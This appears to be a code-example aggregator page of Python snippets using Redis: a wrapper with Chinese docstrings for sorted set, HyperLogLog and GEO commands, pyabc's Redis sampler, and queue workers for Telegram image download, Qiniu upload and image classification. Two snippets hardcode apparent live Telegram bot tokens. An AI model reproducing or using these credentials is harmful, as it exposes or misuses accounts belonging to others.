        return self._redis.zrange(key, start, end, desc, withscores, score_cast_func)

    @format_key()
    def zrevrange(self, key, start, end, withscores=False, score_cast_func=float):
        """
        time complexity O(log(N)+M), N 为有序集的基数,而 M 为结果集的基数。
        Arguments:
            start,有序集合索引起始位置(非分数)
            end,有序集合索引结束位置(非分数)
            withscores,是否获取元素的分数,默认只获取元素的值
            score_cast_func,对分数进行数据转换的函数
        """
        return self._redis.zrevrange(key, start, end, withscores, score_cast_func)

    @format_key()
    def zrangebyscore(self, key, minz, maxz, start=None, num=None, withscores=False, score_cast_func=float):
        """
        time complexity O(log(N)+M), N 为有序集的基数,而 M 为结果集的基数。
        有序集成员按 score 值递增(从小到大)次序排列。
        """
        return self._redis.zrangebyscore(key, minz, maxz, start, num, withscores, score_cast_func)

    @format_key()
    def zrevrangebyscore(self, key, minz, maxz, start=None, num=None, withscores=False, score_cast_func=float):
        """
        time complexity O(log(N)+M), N 为有序集的基数,而 M 为结果集的基数。
        有序集成员按 score 值递减(从大到小)次序排列。
        """
        return self._redis.zrevrangebyscore(key, minz, maxz, start, num, withscores, score_cast_func)

    @format_key()
    def zrangebylex(self, key, minz, maxz, start=None, num=None):
        """
        time complexity O(log(N)+M), N 为有序集的基数,而 M 为结果集的基数。
        有序集成员按 value 字典序递增(从小到大)次序排列。
        """
        return self._redis.zrangebylex(key, minz, maxz, start, num)

    @format_key()
    def zrevrangebylex(self, key, minz, maxz, start=None, num=None):
        """
        time complexity O(log(N)+M), N 为有序集的基数,而 M 为结果集的基数。
        有序集成员按 value 字典序递减(从大到小)次序排列。
        """
        return self._redis.zrevrangebylex(key, minz, maxz, start, num)

    @format_key()
    def zrank(self, key, value):
        """
        time complexity O(log(N))
        查找zset里面这个value的rank排名从0开始
        """
        return self._redis.zrank(key, value)

    @format_key()
    def zrevrank(self, key, value):
        """
        time complexity O(log(N))
        查找zset里面这个value的rank排名从0开始
        """
        return self._redis.zrevrank(key, value)

    @format_key()
    def zrem(self, key, *values):
        """
        time complexity O(M*log(N)), N 为有序集的基数, M 为被成功移除的成员的数量
        删除zset里面单个或者多个成员
        """
        return self._redis.zrem(key, *values)

    @format_key()
    def zremrangebylex(self, key, minz, maxz):
        """
        time complexity O(log(N)+M), N 为有序集的基数,而 M 为被移除成员的数量。
        按照字典增序范围删除
        """
        return self._redis.zremrangebylex(key, minz, maxz)

    @format_key()
    def zremrangebyrank(self, key, minz, maxz):
        """
        time complexity O(log(N)+M), N 为有序集的基数,而 M 为被移除成员的数量。
        按照rank范围删除
        """
        return self._redis.zremrangebyrank(key, minz, maxz)

    @format_key()
    def zremrangebyscore(self, key, minz, maxz):
        """
        time complexity O(log(N)+M), N 为有序集的基数,而 M 为被移除成员的数量。
        按照score范围删除
        """
        return self._redis.zremrangebyscore(key, minz, maxz)

    @format_key()
    def zscore(self, key, value):
        """
        time complexity O(log(N))
        查找zset里面这个value的score排名从0开始
        """
        return self._redis.zscore(key, value)

    @format_key_keys()
    def zunionstore(self, dest, keys, aggregate=None):
        """
        time complexity O(N)+O(M log(M)), N 为给定有序集基数的总和, M 为结果集的基数。
        求并集保存
        """
        return self._redis.zunionstore(dest, keys, aggregate)

    @format_key()
    def zscan(self, key, cursor=0, match=None, count=None, score_cast_func=float):
        """
        time complexity O(1)
        同SCAN
        """
        return self._redis.zscan(key, cursor, match, count, score_cast_func)

    def zlexcount(self, key, minz, maxz):
        """
        time complexity O(log(N)),其中 N 为有序集合包含的元素数量。
        min -负无限  [闭空间不包括自己 (开空间包括自己
        max +正无限 [a, (c
        """
        return self._redis.zlexcount(key, minz, maxz)
# {
    """===============================SortedSet-end================================="""
    """===============================HyperLogLog-start==============================="""
# }
    @format_key()
    def pfadd(self, key, *values):
        """
        time complexity O(n)
        """
        return self._redis.pfadd(key, *values)

    @format_args()
    def pfcount(self, *sources):
        """
        time complexity O(1)
        计算key的基数
        """
        return self._redis.pfcount(*sources)

    @format_args()
    def pfmerge(self, dest, *sources):
        """
        time complexity O(n) 其中 N 为被合并的 HyperLogLog 数量,不过这个命令的常数复杂度比较高
        合并HyperLogLog
        """
        return self._redis.pfmerge(dest, *sources)
# {
    """===============================HyperLogLog-end================================="""

    """==================================GEO-start===================================="""
# }
    @format_key()
    def geoadd(self, key, *values):
        """
        time complexity O(log(N)) 每添加一个元素的复杂度为 O(log(N)) , 其中 N 为键里面包含的位置元素数量。
        """
        return self._redis.geoadd(key, *values)

    @format_key()
    def geopos(self, key, *values):
        """
        time complexity O(log(N))
        从键里面返回所有给定位置元素的位置(经度和纬度)。
        """
        return self._redis.geopos(key, *values)

    @format_key()
    def geohash(self, key, *values):
        """
        time complexity O(log(N))
        命令返回的 geohash 的位置与用户给定的位置元素的位置一一对应
        """
        return self._redis.geohash(key, *values)

    @format_key()
    def geodist(self, key, place1, place2, unit=None):
        """
        time complexity O(log(N))
        返回两个给定位置之间的距离。
        Argument:
            unit : m: 米,km: 千米,mi: 英里,ft: 英尺
        """
        return self._redis.geodist(key, place1, place2, unit)

    @format_key()
    def georadius(self, key, longitude, latitude, radius, unit=None,
                  withdist=False, withcoord=False, withhash=False, count=None,
                  sort=None, store=None, store_dist=None):
        """
        time complexity O(N+log(M)), 其中 N 为指定半径范围内的位置元素数量, 而 M 则是被返回位置元素的数量。
        以给定的经纬度为中心, 返回键包含的位置元素当中, 与中心的距离不超过给定最大距离的所有位置元素。
        Argument:
            longitude: 经度
            latitude: 纬度
            radius: 距离
            unit: 距离单位
            withdist: 在返回位置元素的同时, 将位置元素与中心之间的距离也一并返回。 距离的单位和用户给定的范围单位保持一致。
            withcoord: 将位置元素的经度和维度也一并返回
            withhash: 以 52 位有符号整数的形式, 返回位置元素经过原始 geohash 编码的有序集合分值。
                      这个选项主要用于底层应用或者调试, 实际中的作用并不大。
            sort: 根据中心的位置排序 ASC,DESC
            count: 取前多少个
            store: 保存
            store_dist: 存储地名和距离
        Return:
            list(list)
            [['Foshan', 109.4922], ['Guangzhou', 105.8065]]
        """
        return self._redis.georadius(key, longitude, latitude, radius, unit, withdist, withcoord,
                                     withhash, count, sort, store, store_dist)

    @format_key()
    def georadiusbymember(self, key, member, radius, unit=None,
                          withdist=False, withcoord=False, withhash=False, count=None,
                          sort=None, store=None, store_dist=None):
        """
        time complexity O(N+log(M)), 其中 N 为指定半径范围内的位置元素数量, 而 M 则是被返回位置元素的数量。
        以给定的经纬度为中心, 返回键包含的位置元素当中, 与中心的距离不超过给定最大距离的所有位置元素。
        Argument:
            member: 位置元素
            radius: 距离
            unit: 距离单位
            withdist: 在返回位置元素的同时, 将位置元素与中心之间的距离也一并返回。 距离的单位和用户给定的范围单位保持一致。
            withcoord: 将位置元素的经度和维度也一并返回
            withhash: 以 52 位有符号整数的形式, 返回位置元素经过原始 geohash 编码的有序集合分值。 这个选项主要用于底层应用或者调试, 实际中的作用并不大。
            sort: 根据中心的位置排序 ASC,DESC
            count: 取前多少个
            store: 保存
            store_dist: 存储地名和距离
        Return:
            list(list)
            [['Foshan', 109.4922], ['Guangzhou', 105.8065]]
        """
        return self._redis.georadiusbymember(key, member, radius, unit, withdist, withcoord,
                                             withhash, count, sort, store, store_dist)

# {
    """==================================GEO-end======================================"""
Beispiel #29
0
class RedisEvalParallelSampler(Sampler):
    """
    Redis based low latency sampler.
    This sampler is well performing in distributed environments.
    It is usually faster than the
    :class:`pyabc.sampler.DaskDistributedSampler` for
    short model evaluation runtimes. The longer the model evaluation times,
    the less the advantage becomes. It requires a running Redis server as
    broker.

    This sampler requires workers to be started via the command
    ``abc-redis-worker``.
    An example call might look like
    ``abc-redis-worker --host=123.456.789.123 --runtime=2h``
    to connect to a Redis server on IP ``123.456.789.123`` and to terminate
    the worker after finishing the first population which ends after 2 hours
    since worker start. So the actual runtime might be longer than 2h.
    See ``abc-redis-worker --help`` for its options.

    Use the command ``abc-redis-manager`` to retrieve info and stop the running
    workers.

    Start as many workers as you wish. Workers can be dynamically added
    during the ABC run.

    Parameters
    ----------

    host: str, optional
        IP address or name of the Redis server.
        Default is "localhost".

    port: int, optional
        Port of the Redis server.
        Default is 6379.

    batch_size: int, optional
        Number of model evaluations the workers perform before contacting
        the REDIS server. Defaults to 1. Increase this value if model
        evaluation times are short or the number of workers is large
        to reduce communication overhead.
    """
    def __init__(self, host="localhost", port=6379, batch_size=1):
        super().__init__()
        logger.debug(f"Redis sampler: host={host} port={port}")
        # handles the connection to the redis-server
        self.redis = StrictRedis(host=host, port=port)
        self.batch_size = batch_size

    def n_worker(self):
        """
        Get the number of connected workers.

        Returns
        -------

        Number of workers connected.
        """
        return self.redis.pubsub_numsub(MSG)[0][-1]

    def sample_until_n_accepted(self, n, simulate_one, all_accepted=False):
        # open pipeline
        pipeline = self.redis.pipeline()

        # write initial values to pipeline
        self.redis.set(SSA,
                       cloudpickle.dumps((simulate_one, self.sample_factory)))
        pipeline.set(N_EVAL, 0)
        pipeline.set(N_ACC, 0)
        pipeline.set(N_REQ, n)
        pipeline.set(ALL_ACCEPTED, int(all_accepted))  # encode as int
        pipeline.set(N_WORKER, 0)
        pipeline.set(BATCH_SIZE, self.batch_size)
        # delete previous results
        pipeline.delete(QUEUE)
        # execute all commands
        pipeline.execute()

        id_results = []

        # publish start message
        self.redis.publish(MSG, START)

        # wait until n acceptances
        while len(id_results) < n:
            # pop result from queue, block until one is available
            dump = self.redis.blpop(QUEUE)[1]
            # extract pickled object
            particle_with_id = pickle.loads(dump)
            # append to collected results
            id_results.append(particle_with_id)

        # wait until all workers done
        while int(self.redis.get(N_WORKER).decode()) > 0:
            sleep(SLEEP_TIME)

        # make sure all results are collected
        while self.redis.llen(QUEUE) > 0:
            id_results.append(pickle.loads(self.redis.blpop(QUEUE)[1]))

        # set total number of evaluations
        self.nr_evaluations_ = int(self.redis.get(N_EVAL).decode())

        # delete keys from pipeline
        pipeline = self.redis.pipeline()
        pipeline.delete(SSA)
        pipeline.delete(N_EVAL)
        pipeline.delete(N_ACC)
        pipeline.delete(N_REQ)
        pipeline.delete(ALL_ACCEPTED)
        pipeline.delete(BATCH_SIZE)
        pipeline.execute()

        # avoid bias toward short running evaluations (for
        # dynamic scheduling)
        id_results.sort(key=lambda x: x[0])
        id_results = id_results[:n]

        results = [res[1] for res in id_results]

        # create 1 to-be-returned sample from results
        sample = self._create_empty_sample()
        for j in range(n):
            sample += results[j]

        return sample
Beispiel #30
0
from redis import StrictRedis
import json
import base64
from io import BytesIO
from PIL import Image
import requests
import telepot



r = StrictRedis(host='localhost', port=6379)
while True:
    item = r.blpop('download')
#     print(item[1])
    item = item[1].decode("utf-8")
    data = json.loads(item)
    chat_id = data['chat_id']
    image_file = "{}.png".format(chat_id)

    if 'file_id' in data:
        file_id = data['file_id']
        bot = telepot.Bot("685559472:AAFAm4QE2iVliFhb21rUnLcfWSZ1jMbf_3U")
        bot.download_file(file_id, image_file)
    else:
        content = data['url']
        image_data = requests.get(content).content
        with open(image_file, 'wb') as outfile:
            outfile.write(image_data)

    image = Image.open(image_file)
    buffered = BytesIO()
Beispiel #31
0
BUCKET_NAME = "elfin"
Proxy = {"http": "http://127.0.0.1:48657"}

qiniu = Auth(ACCESS_KEY, SECRET_KEY)

def get_name():
    name = str(time())
    return name.replace(".", "")

def upload_media(media):
    key = get_name()
    data = media
    token = qiniu.upload_token(BUCKET_NAME)
    return put_data(token, key, data)

if __name__ == "__main__":
    while 1:
        media_url = redis.blpop("media_url")
        if media_url:
            media = get(url=media_url[1], proxies=Proxy)
            try:
                ret, info = upload_media(media.content)
            except Exception, e:
                redis.rpush("media_url", media_url)
                logbook.error(e)
            else:
                media_name = ret["key"]
                redis.zadd("image_name", int(media_name), int(media_name))
            finally:
                logbook.info("work on {}".format(media_url))
Beispiel #32
0
from redis import StrictRedis

r = StrictRedis(host='localhost', port=6379)

while True:
    item = r.blpop('channel_01')
    print(item)
Beispiel #33
0
from redis import StrictRedis
from PIL import Image
import json
import wget
from io import BytesIO
import base64
import telepot

r = StrictRedis(host='localhost', port=6379)
bot = telepot.Bot("735092509:AAHMWTa-ZCK8npB5r4FnvMfHW7wTsYLHwAo")

while True:
    item = json.loads(r.blpop('download')[1].decode('utf-8'))
    # print(item)
    print('An item received')
    chat_id = item['chat_id']
    if 'file_id' in item:
        bot.download_file(item['file_id'], 'file.png')
        image = Image.open('file.png')
    elif 'url' in item:
	    filename = wget.download(item['url'])
	    image = Image.open(filename)
    buffered = BytesIO()
    image.save(buffered, format="PNG")
    encoded_image = base64.b64encode(buffered.getvalue()).decode()
    data = {'chat_id':chat_id, 'image': encoded_image}
    message = json.dumps(data)
    r.rpush('image', message.encode("utf-8"))
Beispiel #34
0
# 给列表中指定的 index 赋值
redis.lset('list', 0, -1)



# 列表中指定 value 删除, 并指定删除个数
redis.lrem('list', 2, -1) # 2为个数, -1 为指定value


# 删除列表中的第一个元素, 并将该value 返回
print(redis.lpop('list'))


# 与 lpop 类型的删除, 但是如果列表为空则会阻塞等待
print(redis.blpop('list'))


# 与 blpop 相反, 删除列表中的末尾元素, 如果为空则阻塞等待
print(redis.brpop('list'))


# 将一个 List 的尾元素, 并将其添加到另外一个 list 的头部
redis.rpoplpush('list', 'list2')


# ---------- 集合操作 -----------
# 集合中的元素都是不重复的

# 集合添加元素,如果 key 不存在则直接创建. 第一个参数为 key, 其余的为 value
redis.sadd('tags', 'Book', 'Tea', 'Coffee')
Beispiel #35
0
    predictions.sort(reverse=True)
    result = []
    for score, label in predictions[:5]:
        # print(label, score)
        entry = {"label": label, "score": float(score)}
        result.append(entry)
    return result


r = StrictRedis(host='localhost', port=6379)
content = requests.get(
    "https://s3.amazonaws.com/deep-learning-models/image-models/imagenet_class_index.json"
).text
labels = json.loads(content)

while True:

    item = json.loads(r.blpop('image')[1].decode('utf-8'))
    print('An item received')
    chat_id = item['chat_id']
    image_data = base64.b64decode(item['image'])
    img_path = 'predict.png'
    with open(img_path, 'wb') as outfile:
        outfile.write(image_data)
    im = Image.open(img_path)
    pred_result = predict_image(im, labels)
    data = {'predictions': pred_result, 'chat_id': chat_id}
    message = json.dumps(data)
    r.rpush('prediction', message.encode("utf-8"))
    # print(message)